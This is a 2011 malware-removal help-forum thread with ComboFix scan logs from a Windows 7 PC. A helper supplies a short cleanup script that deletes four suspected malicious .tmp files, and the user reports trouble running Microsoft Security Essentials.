"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2010-11-30 1436224]
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.excite.com/
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride =
TCP: DhcpNameServer = 192.168.2.1 192.168.2.1
.
- - - - ORPHANS REMOVED - - - -
.
Toolbar-Locked - (no file)
.
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MEMSWEEP2]
"ImagePath"="\??\c:\windows\system32\906D.tmp"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil10s_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil10s_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash10s.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.10"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash10s.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash10s.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash10s.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}]
@Denied: (A 2) (Everyone)
@="IFlashBroker4"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
------------------------ Other Running Processes ------------------------
.
c:\program files (x86)\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
c:\program files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe
c:\program files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
c:\program files (x86)\Common Files\Microsoft Shared\Ink\TabTip32.exe
.
**************************************************************************
.
Completion time: 2011-06-28 13:49:59 - machine was rebooted
ComboFix-quarantined-files.txt 2011-06-28 17:49
ComboFix2.txt 2011-06-16 14:12
.
Pre-Run: 443,298,885,632 bytes free
Post-Run: 443,139,854,336 bytes free
.
- - End Of File - - 8A755074ED6B649F2B2EDF9FDCC359F1

Well, at least all that came off ok. I could try installing MS Sec. Essen. in Safte Mode. What if I tried downloading/installing/running SREngLdr.EXE from Safte Mode or from regular mode again. Maybe MS Sec.Essen. would start installing/running then.
I'll wait to hear from you. Frank C. Quote
Well, at least all that came off ok. I could try installing MS Sec. Essen. in Safte Mode.
According to the CF log, MSE is installed and updated. Just make sure that it's activated. If it isn't, you will get a warning that your security is at risk in the lower right hand corner of your desktop.
I have one more script for you to run. Just follow the instructions. There's no copy and paste. just drag the file into ComboFix.

Re-running ComboFix to remove infections:

  • Close any open browsers.
  • Close/disable all anti virus and anti malware programs so they do not INTERFERE with the running of ComboFix.
  • Open NOTEPAD and copy/paste the text in the quotebox below into it:
    Quote
    KillAll::

    File::
    c:\windows\system32\906D.tmp
    c:\windows\system32\41FF.tmp
    c:\windows\system32\EFA6.tmp
    c:\windows\system32\C55B.tmp
    Folder::

  • Save this as CFScript.txt, in the same location as ComboFix.exe



  • Referring to the picture above, drag CFScript into ComboFix.exe
  • When finished, it shall produce a log for you at C:\ComboFix.txt
  • Please post the contents of the log in your next reply.
********************************************************
Please try to run the ESET scan as instructed in Reply # 20 and post the log.Here is ComboFix. I tried MS Sec.Essen. Still is not listed in Start Menu and cannot download it from Microsoft Site. I'll try running ESET as soon as this reply is done. Now for some reason my sound does not work although I can find nothing wrong.


ComboFix 11-06-30.03 - Frank C 06/30/2011 21:39:40.4.8 - x64
Microsoft Windows 7 Professional 6.1.7601.1.1252.1.1033.18.4091.2657 [GMT -4:00]
Running from: c:\users\Frank C\Desktop\ComboFix.exe
Command switches used :: c:\users\Frank C\Desktop\CFScript.txt
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
FILE ::
"c:\windows\system32\41FF.tmp"
"c:\windows\system32\906D.tmp"
"c:\windows\system32\C55B.tmp"
"c:\windows\system32\EFA6.tmp"
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\windows\system32\41FF.tmp
c:\windows\system32\906D.tmp
c:\windows\system32\C55B.tmp
c:\windows\system32\EFA6.tmp
.
.
((((((((((((((((((((((((((((((((((((((( Drivers/Services )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
-------\Service_MEMSWEEP2
.
.
((((((((((((((((((((((((( Files Created from 2011-06-01 to 2011-07-01 )))))))))))))))))))))))))))))))
.
.
2011-07-01 01:42 . 2011-07-01 01:42--------d-----w-c:\users\FLC\AppData\Local\temp
2011-07-01 01:42 . 2011-07-01 01:42--------d-----w-c:\users\Default\AppData\Local\temp
2011-06-29 13:23 . 2011-06-29 13:31--------d-sh--w-c:\windows\SysWow64\AI_RecycleBin
2011-06-29 13:23 . 2011-06-29 13:33--------d-----w-c:\programdata\WeCareReminder
2011-06-29 13:22 . 2011-06-29 13:31--------d-----w-c:\programdata\Yahoo!
2011-06-29 13:22 . 2011-06-29 13:31--------d-----w-c:\program files (x86)\Yahoo!
2011-06-28 18:22 . 2011-06-20 12:578873296----a-w-c:\programdata\Microsoft\Windows Defender\Definition Updates\{2612D223-5B7B-43E7-8C6F-281E58F441E1}\mpengine.dll
2011-06-26 15:23 . 2011-06-26 15:2315672----a-w-c:\windows\system32\drivers\SWDUMon.sys
2011-06-26 15:23 . 2011-06-26 15:32--------d-----w-c:\program files (x86)\DriverUpdate
2011-06-19 09:40 . 2011-06-27 15:51--------d-----w-c:\program files (x86)\Google
2011-06-19 05:05 . 2011-06-19 05:05272480----a-w-c:\windows\system32\drivers\snapman.sys
2011-06-19 05:05 . 2011-06-19 05:05--------d-----w-c:\program files (x86)\Common Files\Acronis
2011-06-19 05:05 . 2011-06-19 05:05--------d-----w-c:\program files (x86)\Acronis
2011-06-18 18:32 . 2011-06-27 15:25--------d-----w-c:\program files (x86)\Sophos
2011-06-17 16:21 . 2011-06-27 15:53--------d-----w-c:\users\Frank
2011-06-17 14:58 . 2011-06-17 14:59--------d-----w-c:\users\Frank 2
2011-06-15 20:45 . 2011-06-15 20:46--------d-----w-c:\program files (x86)\Kensington TrackballWorks
2011-06-15 20:45 . 2010-07-01 20:11370912----a-w-c:\windows\UnKWorks.exe
2011-06-15 16:08 . 2011-06-15 16:08--------d-----w-c:\program files (x86)\Common Files\Java
2011-06-15 00:19 . 2011-04-25 05:331923968----a-w-c:\windows\system32\drivers\tcpip.sys
2011-06-14 04:09 . 2011-06-27 15:53--------d--h--w-c:\users\AppData
2011-06-13 20:52 . 2011-06-13 20:52--------d-----w-c:\program files (x86)\EASEUS
2011-06-13 18:32 . 2011-06-13 18:32404640----a-w-c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2011-06-13 18:13 . 2011-06-13 18:13--------d-----w-c:\users\Default\AppData\Roaming\FixCleaner
2011-06-07 16:35 . 2011-06-07 16:35103864----a-w-c:\program files (x86)\Internet Explorer\Plugins\nppdf32.dll
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2011-05-29 13:11 . 2010-07-15 03:2725912----a-w-c:\windows\system32\drivers\mbam.sys
2011-05-29 01:24 . 2011-05-29 01:243703648----a-w-c:\windows\system32\AutoPartNt.exe
2011-05-29 00:52 . 2011-05-29 00:52961120----a-w-c:\windows\system32\drivers\timntr.sys
2011-05-26 18:48 . 2011-05-26 18:4881952----a-w-c:\windows\system32\drivers\tifsfilt.sys
2011-05-26 18:48 . 2011-05-26 18:48593952----a-w-c:\windows\system32\drivers\tdrpman.sys
2011-05-24 23:14 . 2010-06-17 00:54270720------w-c:\windows\system32\MpSigStub.exe
2011-05-04 08:52 . 2010-07-12 21:26472808----a-w-c:\windows\SysWow64\deployJava1.dll
2011-04-22 22:15 . 2011-05-25 11:2727520----a-w-c:\windows\system32\drivers\Diskdump.sys
2011-04-20 06:44 . 2011-04-20 06:449319936----a-w-c:\windows\system32\drivers\atikmdag.sys
2011-04-20 06:30 . 2011-04-20 06:3022900736----a-w-c:\windows\system32\atio6axx.dll
2011-04-20 06:09 . 2011-04-20 06:09151552----a-w-c:\windows\system32\atiapfxx.exe
2011-04-20 06:09 . 2010-05-27 17:02676864----a-w-c:\windows\SysWow64\aticfx32.dll
2011-04-20 06:07 . 2010-05-27 17:02795648----a-w-c:\windows\system32\aticfx64.dll
2011-04-20 06:07 . 2011-04-20 06:0717693184----a-w-c:\windows\SysWow64\atioglxx.dll
2011-04-20 06:05 . 2011-04-20 06:05462848----a-w-c:\windows\system32\ATIDEMGX.dll
2011-04-20 06:04 . 2011-04-20 06:04480256----a-w-c:\windows\system32\atieclxx.exe
2011-04-20 06:04 . 2011-04-20 06:04203776----a-w-c:\windows\system32\atiesrxx.exe
2011-04-20 06:03 . 2011-04-20 06:03120320----a-w-c:\windows\system32\atitmm64.dll
2011-04-20 06:02 . 2011-04-20 06:02423424----a-w-c:\windows\system32\atipdl64.dll
2011-04-20 06:02 . 2011-04-20 06:02356352----a-w-c:\windows\SysWow64\atipdlxx.dll
2011-04-20 06:02 . 2011-04-20 06:02278528----a-w-c:\windows\SysWow64\Oemdspif.dll
2011-04-20 06:02 . 2011-04-20 06:0216384----a-w-c:\windows\system32\atimuixx.dll
2011-04-20 06:02 . 2011-04-20 06:0259392----a-w-c:\windows\system32\atiedu64.dll
2011-04-20 06:02 . 2011-04-20 06:0243520----a-w-c:\windows\SysWow64\ati2edxx.dll
2011-04-20 05:59 . 2010-05-27 16:544161536----a-w-c:\windows\SysWow64\atidxx32.dll
2011-04-20 05:49 . 2009-11-04 15:314951552----a-w-c:\windows\system32\atidxx64.dll
2011-04-20 05:46 . 2011-04-20 05:4651200----a-w-c:\windows\system32\aticalrt64.dll
2011-04-20 05:46 . 2011-04-20 05:4646080----a-w-c:\windows\SysWow64\aticalrt.dll
2011-04-20 05:46 . 2011-04-20 05:4644544----a-w-c:\windows\system32\aticalcl64.dll
2011-04-20 05:46 . 2011-04-20 05:4644032----a-w-c:\windows\SysWow64\aticalcl.dll
2011-04-20 05:45 . 2011-04-20 05:457768064----a-w-c:\windows\system32\aticaldd64.dll
2011-04-20 05:42 . 2011-04-20 05:426389760----a-w-c:\windows\SysWow64\aticaldd.dll
2011-04-20 05:40 . 2011-04-20 05:401222656----a-w-c:\windows\system32\atiumd6v.dll
2011-04-20 05:40 . 2011-04-20 05:401923584----a-w-c:\windows\SysWow64\atiumdmv.dll
2011-04-20 05:40 . 2011-04-20 05:403868672----a-w-c:\windows\system32\atiumd6a.dll
2011-04-20 05:38 . 2009-11-04 15:234286464----a-w-c:\windows\SysWow64\atiumdag.dll
2011-04-20 05:31 . 2011-04-20 05:315440000----a-w-c:\windows\system32\atiumd64.dll
2011-04-20 05:30 . 2009-11-04 15:054056576----a-w-c:\windows\SysWow64\atiumdva.dll
2011-04-20 05:27 . 2010-05-27 16:3558880----a-w-c:\windows\system32\coinst.dll
2011-04-20 05:23 . 2011-04-20 05:23366080----a-w-c:\windows\system32\atiadlxx.dll
2011-04-20 05:23 . 2011-04-20 05:23262144----a-w-c:\windows\SysWow64\atiadlxy.dll
2011-04-20 05:22 . 2011-04-20 05:2214848----a-w-c:\windows\system32\atig6pxx.dll
2011-04-20 05:22 . 2011-04-20 05:2212800----a-w-c:\windows\SysWow64\atiglpxx.dll
2011-04-20 05:22 . 2011-04-20 05:2212800----a-w-c:\windows\system32\atiglpxx.dll
2011-04-20 05:22 . 2011-04-20 05:2239936----a-w-c:\windows\system32\atig6txx.dll
2011-04-20 05:22 . 2011-04-20 05:2232768----a-w-c:\windows\SysWow64\atigktxx.dll
2011-04-20 05:22 . 2011-04-20 05:22306176----a-w-c:\windows\system32\drivers\atikmpag.sys
2011-04-20 05:21 . 2010-05-27 16:2540960----a-w-c:\windows\system32\atiuxp64.dll
2011-04-20 05:21 . 2010-05-27 16:2431232----a-w-c:\windows\SysWow64\atiuxpag.dll
2011-04-20 05:21 . 2011-04-20 05:2138912----a-w-c:\windows\system32\atiu9p64.dll
2011-04-20 05:21 . 2010-05-27 16:2429184----a-w-c:\windows\SysWow64\atiu9pag.dll
2011-04-20 05:20 . 2011-04-20 05:2053248----a-w-c:\windows\system32\drivers\ati2erec.dll
2011-04-20 05:13 . 2011-04-20 05:1353760----a-w-c:\windows\system32\atimpc64.dll
2011-04-20 05:13 . 2011-04-20 05:1353760----a-w-c:\windows\system32\amdpcom64.dll
2011-04-20 05:13 . 2011-04-20 05:1352736----a-w-c:\windows\SysWow64\atimpc32.dll
2011-04-20 05:13 . 2011-04-20 05:1352736----a-w-c:\windows\SysWow64\amdpcom32.dll
2011-04-13 14:28 . 2010-06-17 17:294283672----a-w-c:\programdata\Microsoft\eHome\Packages\MCEClientUX\UpdateableMarkup\markup.dll
2011-04-13 14:28 . 2010-06-17 17:2842776----a-w-c:\programdata\Microsoft\eHome\Packages\MCEClientUX\dSM\StartResources.dll
2011-04-09 07:02 . 2011-05-11 10:595562240----a-w-c:\windows\system32\ntoskrnl.exe
2011-04-09 06:58 . 2011-05-11 17:19142336----a-w-c:\windows\system32\poqexec.exe
2011-04-09 06:02 . 2011-05-11 10:593967872----a-w-c:\windows\SysWow64\ntkrnlpa.exe
2011-04-09 06:02 . 2011-05-11 10:593912576----a-w-c:\windows\SysWow64\ntoskrnl.exe
2011-04-09 05:56 . 2011-05-11 17:19123904----a-w-c:\windows\SysWow64\poqexec.exe
2011-04-07 20:35 . 2011-04-07 20:35737072----a-w-c:\programdata\Microsoft\eHome\Packages\SportsV2\SportsTemplateCore-2\Microsoft.MediaCenter.Sports.UI.dll
2011-04-07 20:35 . 2011-04-07 20:354277016----a-w-c:\programdata\Microsoft\eHome\Packages\MCEClientUX\UpdateableMarkup-2\markup.dll
2011-04-07 20:34 . 2011-04-07 20:3442776----a-w-c:\programdata\Microsoft\eHome\Packages\MCEClientUX\dSM-2\StartResources.dll
2011-04-07 20:34 . 2010-06-17 17:28539968----a-w-c:\programdata\Microsoft\eHome\Packages\MCESpotlight\MCESpotlight\SpotlightResources.dll
2011-04-06 16:50 . 2011-04-06 16:5074752----a-w-c:\windows\SysWow64\RegisterIEPKEYs.exe
2011-04-06 16:50 . 2011-04-06 16:50161792----a-w-c:\windows\SysWow64\msls31.dll
2011-04-06 16:50 . 2011-04-06 16:501126912----a-w-c:\windows\SysWow64\wininet.dll
2011-04-06 16:50 . 2011-04-06 16:5086528----a-w-c:\windows\SysWow64\iesysprep.dll
2011-04-06 16:50 . 2011-04-06 16:5076800----a-w-c:\windows\SysWow64\SetIEInstalledDate.exe
2011-04-06 16:50 . 2011-04-06 16:5074752----a-w-c:\windows\SysWow64\iesetup.dll
2011-04-06 16:50 . 2011-04-06 16:5063488----a-w-c:\windows\SysWow64\tdc.ocx
2011-04-06 16:50 . 2011-04-06 16:5048640----a-w-c:\windows\SysWow64\mshtmler.dll
2011-04-06 16:50 . 2011-04-06 16:50420864----a-w-c:\windows\SysWow64\vbscript.dll
2011-04-06 16:50 . 2011-04-06 16:50367104----a-w-c:\windows\SysWow64\html.iec
2011-04-06 16:50 . 2011-04-06 16:5023552----a-w-c:\windows\SysWow64\licmgr10.dll
2011-04-06 16:50 . 2011-04-06 16:50152064----a-w-c:\windows\SysWow64\wextract.exe
2011-04-06 16:50 . 2011-04-06 16:50150528----a-w-c:\windows\SysWow64\iexpress.exe
2011-04-06 16:50 . 2011-04-06 16:50142848----a-w-c:\windows\SysWow64\ieUnatt.exe
2011-04-06 16:50 . 2011-04-06 16:501427456----a-w-c:\windows\SysWow64\inetcpl.cpl
2011-04-06 16:50 . 2011-04-06 16:50110592----a-w-c:\windows\SysWow64\IEAdvpack.dll
2011-04-06 16:50 . 2011-04-06 16:5091648----a-w-c:\windows\system32\SetIEInstalledDate.exe
2011-04-06 16:50 . 2011-04-06 16:5089088----a-w-c:\windows\system32\RegisterIEPKEYs.exe
2011-04-06 16:50 . 2011-04-06 16:5049664----a-w-c:\windows\system32\imgutil.dll
2011-04-06 16:50 . 2011-04-06 16:5048640----a-w-c:\windows\system32\mshtmler.dll
2011-04-06 16:50 . 2011-04-06 16:5035840----a-w-c:\windows\SysWow64\imgutil.dll
2011-04-06 16:50 . 2011-04-06 16:50222208----a-w-c:\windows\system32\msls31.dll
2011-04-06 16:50 . 2011-04-06 16:50173056----a-w-c:\windows\system32\ieUnatt.exe
2011-04-06 16:50 . 2011-04-06 16:501389056----a-w-c:\windows\system32\wininet.dll
2011-04-06 16:50 . 2011-04-06 16:50135168----a-w-c:\windows\system32\IEAdvpack.dll
2011-04-06 16:50 . 2011-04-06 16:5012288----a-w-c:\windows\system32\mshta.exe
2011-04-06 16:50 . 2011-04-06 16:5011776----a-w-c:\windows\SysWow64\mshta.exe
2011-04-06 16:50 . 2011-04-06 16:50114176----a-w-c:\windows\system32\admparse.dll
2011-04-06 16:50 . 2011-04-06 16:50111616----a-w-c:\windows\system32\iesysprep.dll
2011-04-06 16:50 . 2011-04-06 16:50101888----a-w-c:\windows\SysWow64\admparse.dll
2011-04-06 16:50 . 2011-04-06 16:5085504----a-w-c:\windows\system32\iesetup.dll2011-04-06 16:50 . 2011-04-06 16:5076800----a-w-c:\windows\system32\tdc.ocx
2011-04-06 16:50 . 2011-04-06 16:50603648----a-w-c:\windows\system32\vbscript.dll
.
.
((((((((((((((((((((((((((((( SnapShot_2011-06-28_17.48.19 )))))))))))))))))))))))))))))))))))))))))
.
- 2009-07-14 00:13 . 2009-07-14 01:1486528 c:\windows\SysWOW64\SearchFilterHost.exe
+ 2011-06-28 18:21 . 2011-05-04 04:2886528 c:\windows\SysWOW64\SearchFilterHost.exe
- 2009-07-14 00:12 . 2009-07-14 01:1559392 c:\windows\SysWOW64\msscntrs.dll
+ 2011-06-28 18:21 . 2011-05-04 04:3259392 c:\windows\SysWOW64\msscntrs.dll
- 2009-07-13 23:16 . 2009-07-14 01:1544544 c:\windows\SysWOW64\devrtl.dll
+ 2011-06-28 18:21 . 2011-05-24 10:4044544 c:\windows\SysWOW64\devrtl.dll
+ 2011-06-28 18:21 . 2011-05-24 10:4064512 c:\windows\SysWOW64\devobj.dll
- 2009-07-13 23:16 . 2009-07-14 01:1564512 c:\windows\SysWOW64\devobj.dll
+ 2010-06-15 09:52 . 2011-07-01 00:0785652 c:\windows\system32\wdi\ShutdownPerformanceDiagnostics_SystemData.bin
+ 2009-07-14 05:10 . 2011-07-01 00:0740070 c:\windows\system32\wdi\BootPerformanceDiagnostics_SystemData.bin
+ 2010-06-15 08:27 . 2011-07-01 00:0715250 c:\windows\system32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\S-1-5-21-3224318273-3311775750-3685103505-1000_UserData.bin
- 2009-07-14 00:29 . 2009-07-14 01:4175264 c:\windows\system32\msscntrs.dll
+ 2011-06-28 18:21 . 2011-05-04 05:2275264 c:\windows\system32\msscntrs.dll
+ 2011-04-20 05:27 . 2011-04-20 05:2758880 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\coinst.dll
+ 2011-04-20 05:21 . 2011-04-20 05:2131232 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atiuxpag.dll
+ 2011-04-20 05:21 . 2011-04-20 05:2140960 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atiuxp64.dll
+ 2011-04-20 05:21 . 2011-04-20 05:2129184 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atiu9pag.dll
+ 2011-04-20 05:21 . 2011-04-20 05:2138912 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atiu9p64.dll
+ 2009-06-22 19:34 . 2009-06-22 19:3451200 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\ATIODCLI.exe
+ 2011-04-20 06:02 . 2011-04-20 06:0216384 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atimuixx.dll
+ 2011-04-20 05:13 . 2011-04-20 05:1353760 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atimpc64.dll
+ 2011-04-20 05:13 . 2011-04-20 05:1352736 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atimpc32.dll
+ 2011-04-20 05:22 . 2011-04-20 05:2212800 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atiglpxx.dll
+ 2011-04-20 05:22 . 2011-04-20 05:2232768 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atigktxx.dll
+ 2011-04-20 05:22 . 2011-04-20 05:2239936 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atig6txx.dll
+ 2011-04-20 05:22 . 2011-04-20 05:2214848 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atig6pxx.dll
+ 2011-04-20 06:02 . 2011-04-20 06:0259392 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atiedu64.dll
+ 2011-04-20 05:46 . 2011-04-20 05:4651200 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\aticalrt64.dll
+ 2011-04-20 05:46 . 2011-04-20 05:4646080 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\aticalrt.dll
+ 2011-04-20 05:46 . 2011-04-20 05:4644544 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\aticalcl64.dll
+ 2011-04-20 05:46 . 2011-04-20 05:4644032 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\aticalcl.dll
+ 2011-04-20 05:20 . 2011-04-20 05:2053248 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\ati2erec.dll
+ 2011-04-20 06:02 . 2011-04-20 06:0243520 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\ati2edxx.dll
- 2010-06-15 06:50 . 2011-06-28 14:4316384 c:\windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
+ 2010-06-15 06:50 . 2011-06-29 13:2316384 c:\windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
+ 2010-06-15 06:50 . 2011-06-29 13:2332768 c:\windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
- 2010-06-15 06:50 . 2011-06-28 14:4332768 c:\windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
- 2009-07-14 04:54 . 2011-06-28 14:4316384 c:\windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
+ 2009-07-14 04:54 . 2011-06-29 13:2316384 c:\windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
- 2009-02-03 21:52 . 2009-02-03 21:5251200 c:\windows\system32\ATIODCLI.exe
+ 2009-06-22 19:34 . 2009-06-22 19:3451200 c:\windows\system32\ATIODCLI.exe
+ 2011-03-17 21:51 . 2011-03-17 21:513929 c:\windows\SysWOW64\atipblag.dat
+ 2011-03-17 21:51 . 2011-03-17 21:513929 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atipblag.dat
+ 2011-03-17 21:51 . 2011-03-17 21:513929 c:\windows\system32\atipblag.dat
+ 2011-07-01 01:43 . 2011-07-01 01:432048 c:\windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat
- 2011-06-28 16:49 . 2011-06-28 16:492048 c:\windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat
+ 2011-07-01 01:43 . 2011-07-01 01:432048 c:\windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat
- 2011-06-28 16:49 . 2011-06-28 16:492048 c:\windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat
- 2009-07-14 00:14 . 2009-07-14 01:14164352 c:\windows\SysWOW64\SearchProtocolHost.exe
+ 2011-06-28 18:21 . 2011-05-04 04:28164352 c:\windows\SysWOW64\SearchProtocolHost.exe
+ 2011-06-28 18:21 . 2011-05-04 04:28427520 c:\windows\SysWOW64\SearchIndexer.exe
- 2011-02-23 19:18 . 2010-11-20 12:19666624 c:\windows\SysWOW64\mssvp.dll
+ 2011-06-28 18:21 . 2011-05-04 04:32666624 c:\windows\SysWOW64\mssvp.dll
- 2011-02-23 19:18 . 2010-11-20 12:19197120 c:\windows\SysWOW64\mssphtb.dll
+ 2011-06-28 18:21 . 2011-05-04 04:32197120 c:\windows\SysWOW64\mssphtb.dll
- 2009-07-14 00:13 . 2009-07-14 01:15337408 c:\windows\SysWOW64\mssph.dll
+ 2011-06-28 18:21 . 2011-05-04 04:32337408 c:\windows\SysWOW64\mssph.dll
